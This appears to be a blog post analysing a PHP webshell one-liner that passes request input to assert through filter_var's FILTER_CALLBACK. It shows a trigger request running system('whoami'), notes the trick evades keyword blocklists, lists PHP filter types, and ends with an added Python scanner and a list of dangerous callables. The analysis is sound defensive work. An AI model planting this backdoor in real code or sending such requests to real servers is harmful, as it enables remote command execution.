The Sample

<?php
filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));
?>

It looks easy to understand, so let's try to learn more from this sample.

Analysis

filter_var

From php.net:

filter_var — Filters a variable with a specified filter

Description:
mixed filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] )
  1. $variable is the value to filter.
  2. $filter (FILTER_DEFAULT by default) is the ID of the filter to apply. Which types are there? They are listed at the end of this article, so we can continue the analysis here.
  3. $options passes the options that the chosen filter needs.

Sample

The sample uses the FILTER_CALLBACK filter, so let's see what it does.
It is listed under 'Other filters':
(image: [12.25] The first samples of php Trojan analysis)
It calls a user-defined function to filter the data, and its 'Options' value is a 'callable function or method'.
Okay, now we get the meaning:

filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));

It uses FILTER_CALLBACK to call the function 'assert' on $_REQUEST['op'].
To make it more obvious, the expression is equivalent to this one:

assert($_REQUEST['op']);

So a request like url?op=system('whoami') is enough to execute our code. Dangerous!

FILTER TYPE

The filters are divided into four categories:
validate filters, sanitize filters, other filters and filter flags.

For validate filters

  1. FILTER_VALIDATE_BOOLEAN
    Returns TRUE for “1”, “true”, “on” and “yes”. Returns FALSE otherwise.

    If FILTER_NULL_ON_FAILURE is set, FALSE is returned only for “0”, “false”, “off”, “no”, and “”, and NULL is returned for all non-boolean values.

  2. FILTER_VALIDATE_DOMAIN

  3. FILTER_VALIDATE_EMAIL

  4. FILTER_VALIDATE_FLOAT

  5. FILTER_VALIDATE_INT

  6. FILTER_VALIDATE_IP

  7. FILTER_VALIDATE_MAC

  8. FILTER_VALIDATE_REGEXP

  9. FILTER_VALIDATE_URL

The relation between them is obvious from one example, so I have left out the explanations of the others.

For Sanitize filters

  1. FILTER_SANITIZE_EMAIL
    Remove all characters except letters, digits and !#$%&'*+-=?^_`{|}~@.[].
  2. FILTER_SANITIZE_ENCODED
  3. FILTER_SANITIZE_MAGIC_QUOTES
  4. FILTER_SANITIZE_NUMBER_FLOAT
  5. FILTER_SANITIZE_NUMBER_INT
  6. FILTER_SANITIZE_SPECIAL_CHARS
  7. FILTER_SANITIZE_FULL_SPECIAL_CHARS
  8. FILTER_SANITIZE_STRING
  9. FILTER_SANITIZE_STRIPPED
  10. FILTER_SANITIZE_URL
  11. FILTER_UNSAFE_RAW

Other filters

  1. FILTER_CALLBACK

Filter flags

They are used with the other filters to do the fine-grained work.
A picture shows them:
(image: [12.25] The first samples of php Trojan analysis)

What can we get from this story?

  1. Pay attention to assert, whether or not it appears as a function call.
  2. Watch the use of filter_var: maybe it can be used to bypass checks that only block words like exec.
  3. There are lots of filter types waiting for us to dig into.
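
A defender's view of takeaways 1 and 2, as an added example that is not part of the original post: a small Python scanner that flags filter_* calls using FILTER_CALLBACK, which a blocklist of words like exec or eval never sees. The DANGEROUS list, the level names and every sample line except the page's one-liner are assumptions made for this example.

```python
import re

# Callables that run code or commands on their argument (assumed list for
# this example, not exhaustive).
DANGEROUS = {"assert", "system", "exec", "passthru", "shell_exec",
             "popen", "proc_open", "create_function"}
CALL = re.compile(r"\bfilter_(?:var|input)(?:_array)?\s*\(", re.I)
TAINT = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")
OPTION = re.compile(r"""['"]options['"]\s*=>\s*(['"])([^'"]*)\1\s*(?=[,)\]])""", re.I)

# Constructed sample: line 2 is the page's one-liner, the rest are made up.
SAMPLE = r"""<?php
filter_var($_REQUEST['op'], FILTER_CALLBACK, array('options' => 'assert'));
$clean = filter_var($name, FILTER_CALLBACK, ['options' => 'trim']);
filter_var($_POST["x"], FILTER_CALLBACK, array("options" => $cb));
$n = filter_var($_GET['n'], FILTER_VALIDATE_INT);
"""

def call_args(src, start):
    """Text from just after the opening '(' up to its matching ')'."""
    depth, quote, i = 1, None, start
    while i < len(src) and depth:
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1          # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "()":
            depth += 1 if ch == "(" else -1
        i += 1
    return src[start:i - 1] if depth == 0 else src[start:]

def scan(src):
    """One finding per filter_* call that uses FILTER_CALLBACK."""
    findings = []
    for m in CALL.finditer(src):
        args = call_args(src, m.end())
        if "FILTER_CALLBACK" not in args.upper():
            continue
        opt = OPTION.search(args)
        name = opt.group(2).lower() if opt else None
        # high: dangerous literal; review: not a plain literal; info: other literal
        level = "high" if name in DANGEROUS else "review" if name is None else "info"
        findings.append({"line": src.count("\n", 0, m.start()) + 1, "callback": name,
                         "level": level, "user_input": bool(TAINT.search(args))})
    return findings
```

A "review" result means the callback is not a plain string literal and needs a human look. assert() only evaluates string arguments before PHP 8.0, so the runtime version matters when triaging a hit.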
